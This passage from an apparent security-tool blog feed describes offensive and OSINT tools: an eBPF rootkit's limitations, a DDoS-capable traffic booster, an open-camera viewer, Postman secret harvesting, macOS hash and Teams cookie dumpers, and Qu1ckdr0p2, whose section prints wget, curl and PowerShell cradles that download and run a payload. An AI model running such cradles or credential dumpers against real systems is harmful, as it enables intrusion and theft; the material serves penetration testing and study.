    • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

    • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided, as it would hide every non-nysm eBPF object.

    Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



    PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

    By: Zion3R


    PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

    Features:

    • Utilizes a list of proxy IP addresses from a specified file.
    • Supports both HTTP and HTTPS proxies.
    • Allows users to input the target website URL, proxy file path, and a static port.
    • Makes HTTP requests to the specified website using each proxy.
    • Parses HTML content to extract and visit links on the webpage.
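
    The mechanics of that list can be sketched in a few lines of requests/BeautifulSoup (illustrative, not the tool's exact code; the target URL is a placeholder, and proxies.txt follows the format described below):

    import requests
    from bs4 import BeautifulSoup

    def crawl_via_proxy(url: str, proxy: str) -> list:
        """Fetch a page through one proxy and return the links found on it."""
        proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
        resp = requests.get(url, proxies=proxies, timeout=10)
        soup = BeautifulSoup(resp.text, "html.parser")
        return [a["href"] for a in soup.find_all("a", href=True)]

    # One proxy per line in proxies.txt, e.g. 50.168.163.176:80
    with open("proxies.txt") as f:
        for proxy in (line.strip() for line in f if line.strip()):
            try:
                links = crawl_via_proxy("https://example.com", proxy)
                print(f"{proxy}: {len(links)} links")
            except requests.RequestException as exc:
                print(f"{proxy}: failed ({exc})")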

    Usage:

    • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
    • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
    • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
    • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
    • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

    Get new proxies (with ports) and add them to proxies.txt in this format: 50.168.163.176:80
    • You can get them from here: https://free-proxy-list.net/. These free proxies are not validated and some might not work, so validate them before adding.

    How to Use:

    1. Clone the repository:
    git clone https://github.com/spyboy-productions/PhantomCrawler.git
    2. Install dependencies:
    pip3 install -r requirements.txt
    3. Run the script:
    python3 PhantomCrawler.py

    Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


    Snapshots:

    If you find this GitHub repo useful, please consider giving it a star!



    Pantheon - Insecure Camera Parser

    By: Zion3R


    Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

    Functionalities

    Pantheon allows users to execute an API crawler. There was originally functionality without the use of any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.


    Installation

    1. git clone https://github.com/josh0xA/Pantheon.git
    2. cd Pantheon
    3. pip3 install -r requirements.txt
      Execution: python3 pantheon.py
    • Note: I will later add a GUI installer to make it fully independent of a CLI

    Windows

    • You can just follow the steps above or download the official package here.
    • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

    Ubuntu

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/ubuntu_install.sh
    • ./distros/ubuntu_install.sh

    Debian and Kali Linux

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/debian-kali_install.sh
    • ./distros/debian-kali_install.sh

    MacOS

    • The regular installation steps above should suffice. If not, open up an issue.

    Usage

    (Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

    (Left-click) on a selected IP:Port to view the geolocation of the camera.
    (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

    Adjust the map as you please to see the markers.

    • Also note that this app is far from perfect and not every link that shows up is a live feed; some are login pages (do NOT attempt to log in).

    Ethical Notice

    The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

    Licence

    MIT License
    Copyright (c) Josh Schiavone



    Top 20 Most Popular Hacking Tools in 2023

    By: Zion3R

    As in previous years, we have put together a ranking of the most popular tools seen between January and December 2023.

    The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

    Without going into further detail, we have prepared a useful list of the most popular tools on KitPloit in 2023:


    1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


    2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


    3. Faraday - Open Source Vulnerability Management Platform


    4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


    5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


    6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


    7. Waf-Bypass - Check Your WAF Before An Attacker Does


    8. PentestGPT - A GPT-empowered Penetration Testing Tool


    9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


    10. LSMS - Linux Security And Monitoring Scripts


    11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


    12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


    13. ThunderCloud - Cloud Exploit Framework


    14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


    15. Kscan - Simple Asset Mapping Tool


    16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


    17. DNSWatch - DNS Traffic Sniffer and Analyzer


    18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


    19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


    20. XSS-Exploitation-Tool - An XSS Exploitation Tool





    Happy New Year wishes the KitPloit team!


    Blutter - Flutter Mobile Application Reverse Engineering Tool

    By: Zion3R


    Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime

    Currently the application supports only Android libapp.so (arm64 only). It also currently works only against recent Dart versions.

    For high priority missing features, see TODO


    Environment Setup

    This application uses the C++20 formatting library and requires a very recent C++ compiler such as g++ >= 13 or Clang >= 15.

    I recommend using a Linux OS (only tested on Debian sid/trixie) because it is easy to set up.

    Debian Unstable (gcc 13)

    • Install build tools and dependencies
    apt install python3-pyelftools python3-requests git cmake ninja-build \
    build-essential pkg-config libicu-dev libcapstone-dev

    Windows

    • Install git and python 3
    • Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
    • Install required libraries (libcapstone and libicu4c)
    python scripts\init_env_win.py
    • Start "x64 Native Tools Command Prompt"

    macOS Ventura (clang 15)

    • Install XCode
    • Install clang 15 and required tools
    brew install llvm@15 cmake ninja pkg-config icu4c capstone
    pip3 install pyelftools requests

    Usage

    Extract "lib" directory from apk file

    python3 blutter.py path/to/app/lib/arm64-v8a out_dir

    The blutter.py script will automatically detect the Dart version from the Flutter engine and call the blutter executable to extract the information from libapp.so.

    If the blutter executable for the required Dart version does not exist, the script will automatically check out the Dart source code and compile it.

    Update

    You can use git pull to update, then run blutter.py with the --rebuild option to force rebuilding the executable:

    python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild

    Output files

    • asm/* libapp assemblies with symbols
    • blutter_frida.js the frida script template for the target application
    • objs.txt complete (nested) dump of Object from Object Pool
    • pp.txt all Dart objects in Object Pool

    Directories

    • bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
    • blutter contains source code. need building against Dart VM library
    • build contains building projects which can be deleted after finishing the build process
    • dartsdk contains checkout of Dart Runtime which can be deleted after finishing the build process
    • external contains 3rd party libraries for Windows only
    • packages contains the static libraries of Dart Runtime
    • scripts contains python scripts for getting/building Dart

    Generating Visual Studio Solution for Development

    I use Visual Studio to develop Blutter on Windows. The --vs-sln option can be used to generate a Visual Studio solution.

    python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln

    TODO

    • More code analysis
      • Function arguments and return type
      • Some pseudocode for code patterns
    • Generate better Frida script
      • More internal classes
      • Object modification
    • Obfuscated app (still missing many functions)
    • Reading iOS binary
    • Input as apk or ipa


    Osx-Password-Dumper - A Tool To Dump Users' .plist Files On A macOS System And Convert Them Into A Crackable Hash

    By: Zion3R


    OSX Password Dumper Script

    Overview

    A bash script to retrieve users' .plist files on a macOS system and convert the data inside them to a crackable hash format (to use with John the Ripper or Hashcat).

    Useful for CTFs/Pentesting/Red Teaming on macOS systems.


    Prerequisites

    • The script must be run as a root user (sudo)
    • macOS environment (tested on a macOS VM Ventura beta 13.0 (22A5266r))

    Usage

    sudo ./osx_password_cracker.sh OUTPUT_FILE /path/to/save/.plist


    CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

    By: Zion3R


    CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


    Key Features:

    • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

    • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

    • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

    • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

    With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
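
    The core subdomain-scanning idea can be sketched as: resolve candidate subdomains and flag any answer that falls outside Cloudflare's published ranges (an illustrative sketch only; the wordlist is hypothetical and the range list below is an abbreviated subset):

    import ipaddress
    import socket

    # Abbreviated, illustrative subset of Cloudflare's published IPv4 ranges.
    CLOUDFLARE_RANGES = [ipaddress.ip_network(n) for n in (
        "104.16.0.0/13", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
    )]

    def behind_cloudflare(ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in CLOUDFLARE_RANGES)

    def scan(domain: str, words: list) -> None:
        for sub in words:
            fqdn = f"{sub}.{domain}"
            try:
                ip = socket.gethostbyname(fqdn)
            except socket.gaierror:
                continue                                  # does not resolve
            if not behind_cloudflare(ip):
                print(f"[+] possible real IP: {fqdn} -> {ip}")

    scan("example.com", ["www", "mail", "ftp", "dev", "staging"])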

    Limitation

    - Still in the development phase; sometimes it can't detect the real IP.

    - CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

    1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

    2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

    3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.

    This tool is a Proof of Concept and is for Educational Purposes Only.

    How to Use:

    1. Run CloakQuest3r with a single command-line argument: the target domain you want to analyze.

       git clone https://github.com/spyboy-productions/CloakQuest3r.git
      cd CloakQuest3r
      pip3 install -r requirements.txt
      python cloakquest3r.py example.com
    2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

    3. If Cloudflare is detected, CloakQuest3r will scan for subdomains and identify their real IP addresses.

    4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

    5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

    CloakQuest3r simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

    Run It Online:

    Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


    Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration of recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

    The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

    p = porchpirate()
    print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

    p = porchpirate()
    collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
    for collection in collections['data']:
        requests = collection['requests']
        for r in requests:
            request_data = p.request(r['id'])
            print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    Windiff - Web-based Tool That Allows Comparing Symbol, Type And Syscall Information Of Microsoft Windows Binaries Across Different Versions Of The OS

    By: Zion3R


    WinDiff is an open-source web-based tool that allows browsing and comparing symbol, type and syscall information of Microsoft Windows binaries across different versions of the operating system. The binary database is automatically updated to include information from the latest Windows updates (including Insider Preview).

    It was inspired by ntdiff and made possible with the help of Winbindex.


    How It Works

    WinDiff is made of two parts: a CLI tool written in Rust and a web frontend written in TypeScript using the Next.js framework.

    The CLI tool is used to generate compressed JSON databases out of a configuration file and relies on Winbindex to find and download the required PEs (and PDBs). Types are reconstructed using resym. The idea behind the CLI tool is to be able to easily update and regenerate databases as new versions of Windows are released. The CLI tool's code is in the windiff_cli directory.

    The frontend is used to visualize the data generated by the CLI tool, in a user-friendly way. The frontend follows the same principle as ntdiff, as it allows browsing information extracted from official Microsoft PEs and PDBs for certain versions of Microsoft Windows and also allows comparing this information between versions. The frontend's code is in the windiff_frontend directory.

    A scheduled GitHub action fetches new updates from Winbindex every day and updates the configuration file used to generate the live version of WinDiff. Currently, because of the storage and compute limitations of free plans, only KB and Insider Preview updates less than one year old are kept for the live version. You can of course rebuild a local version of WinDiff yourself, without those limitations, if you need to. See the next section for that.

    Note: Winbindex doesn't provide unique download links for 100% of the indexed files, so some PEs' information may be unavailable in WinDiff. However, as soon as these PEs are on VirusTotal, Winbindex will be able to provide unique download links for them and they will then be integrated into WinDiff automatically.

    How to Build

    Prerequisites

    • Rust 1.68 or later
    • Node.js 16.8 or later

    Command-Line

    The full build of WinDiff is "self-documented" in ci/build_frontend.sh, which is the build script used to build the live version of WinDiff. Here's what's inside:

    # Resolve the project's root folder
    PROJECT_ROOT=$(git rev-parse --show-toplevel)

    # Generate databases
    cd "$PROJECT_ROOT/windiff_cli"
    cargo run --release "$PROJECT_ROOT/ci/db_configuration.json" "$PROJECT_ROOT/windiff_frontend/public/"

    # Build the frontend
    cd "$PROJECT_ROOT/windiff_frontend"
    npm ci
    npm run build

    The configuration file used to generate the data for the live version of WinDiff is located here: ci/db_configuration.json, but you can customize it or use your own. PRs aimed at adding new binaries to track in the live configuration are welcome.



    OSINT-Framework - OSINT Framework

    By: Zion3R


    OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.

    I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!

    Please visit the framework at the link below and good hunting!


    https://osintframework.com

    Legend

    (T) - Indicates a link to a tool that must be installed and run locally
    (D) - Google Dork, for more information: Google Hacking
    (R) - Requires registration
    (M) - Indicates a URL that contains the search term and the URL itself must be edited manually

    For Update Notifications

    Follow me on Twitter: @jnordine - https://twitter.com/jnordine
    Watch or star the project on GitHub: https://github.com/lockfale/osint-framework

    Suggestions, Comments, Feedback

    Feedback and new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on GitHub, or reach out on Twitter.

    Contribute with a GitHub Pull Request

    For new resources, please ensure that the site is available for public and free use.

    1. Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry.
    2. Submit a pull request!
    3. Thank you!
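
    The authoritative schema is arf.json itself; as a rough, illustrative sketch (written here as a Python literal, with field names to verify against existing entries), a leaf entry carries a name, a type and a url, while folder entries group leaves under children:

    # Illustrative sketch only -- mirror an existing arf.json entry when contributing.
    new_entry = {
        "name": "Example Tool",       # display name shown in the tree
        "type": "url",                # leaf node; folders use "folder" plus "children"
        "url": "https://example.com"  # target resource
    }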

    OSINT Framework Website

    https://osintframework.com

    Happy Hunting!



    ICS-Forensics-Tools - Microsoft ICS Forensics Framework

    By: Zion3R


    Microsoft ICS Forensics Tools is an open-source forensic framework for analyzing industrial PLC metadata and project files.
    It enables investigators to identify suspicious artifacts in ICS environments and detect compromised devices during incident response or manual checks.
    Being open source, the framework allows investigators to verify the actions of the tool or customize it to specific needs.


    Getting Started

    These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

    git clone https://github.com/microsoft/ics-forensics-tools.git

    Prerequisites

    Installing

    • Install python requirements

      pip install -r requirements.txt

    Usage

    General application arguments:

    Args Description Required / Optional
    -h, --help show this help message and exit Optional
    -s, --save-config Save config file for easy future usage Optional
    -c, --config Config file path, default is config.json Optional
    -o, --output-dir Directory in which to output any generated files, default is output Optional
    -v, --verbose Log output to a file as well as the console Optional
    -p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional

    Specific plugin arguments:

    Args Description Required / Optional
    -h, --help show this help message and exit Optional
    --ip Addresses file path, CIDR, or IP addresses CSV (ip column required; add more columns for additional info about each IP, such as username, pass, etc.) Required
    --port Port number Optional
    --transport tcp/udp Optional
    --analyzer Analyzer name to run Optional

    Executing examples in the command line

    python driver.py -s -v PluginName --ip ips.csv
    python driver.py -s -v PluginName --analyzer AnalyzerName
    python driver.py -s -v -c config.json --multiprocess

    Import as library example

    from forensic.client.forensic_client import ForensicClient
    from forensic.interfaces.plugin import PluginConfig

    forensic = ForensicClient()
    plugin = PluginConfig.from_json({
        "name": "PluginName",
        "port": 123,
        "transport": "tcp",
        "addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
        "parameters": {},
        "analyzers": []
    })
    forensic.scan([plugin])

    Architecture

    Adding Plugins

    When developing locally, make sure to mark the src folder as "Sources root".

    • Create a new directory under the plugins folder with your plugin name
    • Create a new Python file with your plugin name
    • Use the following template to write your plugin, replacing 'General' with your plugin name
    from pathlib import Path
    from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
    from forensic.common.constants.constants import Transport


    class GeneralCLI(PluginCLI):
        def __init__(self, folder_name):
            super().__init__(folder_name)
            self.name = "General"
            self.description = "General Plugin Description"
            self.port = 123
            self.transport = Transport.TCP

        def flags(self, parser):
            self.base_flags(parser, self.port, self.transport)
            parser.add_argument('--general', help='General additional argument', metavar="")


    class General(PluginInterface):
        def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
            super().__init__(config, output_dir, verbose)

        def connect(self, address):
            self.logger.info(f"{self.config.name} connect")

        def export(self, extracted):
            self.logger.info(f"{self.config.name} export")
    • Make sure to import your new plugin in the __init__.py file under the plugins folder
    • In the PluginInterface subclass there is a 'config' parameter; you can use it to access any data available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
      There are two mandatory functions (connect, export).
      The connect function receives a single IP address, extracts any relevant information from the device, and returns it.
      The export function receives the information extracted from all the devices; there you can export it to a file.
    • In the PluginCLI subclass you need to specify in the init function the default information related to this plugin.
      There is a single mandatory function (flags), in which you must call base_flags; you can add any additional flags that you want to have.

    Adding Analyzers

    • Create a new directory under the analyzers folder named after the plugin your analyzer relates to.
    • Create a new Python file with your analyzer name.
    • Use the following template to write your analyzer, replacing 'General' with your analyzer name.
    from pathlib import Path
    from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


    class General(AnalyzerInterface):
        def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
            super().__init__(config, output_dir, verbose)
            self.plugin_name = 'General'
            self.create_output_dir(self.plugin_name)

        def analyze(self):
            pass
    • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

    Resources and Technical Data & Solutions:

    Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

    Section 52 under MSRC blog
    ICS Lecture given about the tool
    Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

    Contributing

    This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

    When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

    This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

    Trademarks

    This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos is subject to those third parties' policies.



    Qu1Ckdr0P2 - Quickly Serve Files Over HTTP Or HTTPS Using Flask

    By: Zion3R


    Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.

    Designed to be used on exams like OSCP / PNPT, or CTFs like HTB, etc.

    Pull requests and issues welcome. As are any contributions.

    Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default, a self-signed certificate is generated for the --https option. When the webserver is running, priority is given to the tun0 interface; otherwise eth0 is used.
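
    A rough sketch of that interface-priority logic (not the tool's actual code; assumes the netifaces package) might look like:

    import netifaces

    def pick_interface():
        # Prefer tun0 (e.g. a VPN into the target network), fall back to eth0
        for iface in ("tun0", "eth0"):
            if iface in netifaces.interfaces():
                inet = netifaces.ifaddresses(iface).get(netifaces.AF_INET)
                if inet:
                    return iface, inet[0]["addr"]
        return None, None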

    The common.ini defines the mapped aliases used within the --search and -u options.


    When the webserver is running there are several download cradles printed to the screen to copy and paste.

    pip3 install qu1ckdr0p2

    echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
    source ~/.zshrc

    or

    echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
    source ~/.bashrc

    serv init --update

    $ serv serve -f implant.bin --https 443
    $ serv serve -f file.example --http 8080

    $ serv --help            
    Usage: serv [OPTIONS] COMMAND [ARGS]...

    Welcome to qu1ckdr0p2 entry point.

    Options:
    --debug Enable debug mode.
    --help Show this message and exit.

    Commands:
    init Perform updates.
    serve Serve files.
    $ serv serve --help
    Usage: serv serve [OPTIONS]

    Serve files.

    Options:
    -l, --list List aliases
    -s, --search TEXT Search query for aliases
    -u, --use INTEGER Use an alias by a dynamic number
    -f, --file FILE Serve a file
    --http INTEGER Use HTTP with a custom port
    --https INTEGER Use HTTPS with a custom port
    -h, --help Show this message and exit.
    $ serv init --help       
    Usage: serv init [OPTIONS]

    Perform updates.

    Options:
    --update Check and download missing tools.
    --update-self Update the tool using pip.
    --update-self-test Used for dev testing, installs unstable build.
    --help Show this message and exit.
    $ serv init --update
    $ serv init --update-self

    The mapped alias numbers for the -u option are dynamic so you don't have to remember specific numbers or ever type out a tool name.

    $ serv serve --search ligolo               

    [→] Path: ~/.qu1ckdr0p2/windows/agent.exe
    [→] Alias: ligolo_agent_win
    [→] Use: 1

    [→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
    [→] Alias: ligolo_proxy_win
    [→] Use: 2

    [→] Path: ~/.qu1ckdr0p2/linux/agent
    [→] Alias: ligolo_agent_linux
    [→] Use: 3

    [→] Path: ~/.qu1ckdr0p2/linux/proxy
    [→] Alias: ligolo_proxy_linux
    [→] Use: 4
    (...)
    $ serv serve --search ligolo -u 3 --http 80

    [→] Serving: ../../.qu1ckdr0p2/linux/agent
    [→] Protocol: http
    [→] IP address: 192.168.1.5
    [→] Port: 80
    [→] Interface: eth0
    [→] CTRL+C to quit

    [→] URL: http://192.168.1.5:80/agent

    [↓] csharp:
    $webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

    [↓] wget:
    wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

    [↓] curl:
    curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

    [↓] powershell:
    Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

    Web server running

    MIT



    Teams_Dump - PoC For Dumping And Decrypting Cookies In The Latest Version Of Microsoft Teams

    By: Zion3R


    PoC for dumping and decrypting cookies in the latest version of Microsoft Teams


    extract.py simply dumps the cookies when run without arguments.

    extract.exe is just extract.py packed into an exe.

    List values in the database

    python.exe .\teams_dump.py teams --list

    Table: meta
    Columns in meta: key, value
    --------------------------------------------------
    Table: cookies
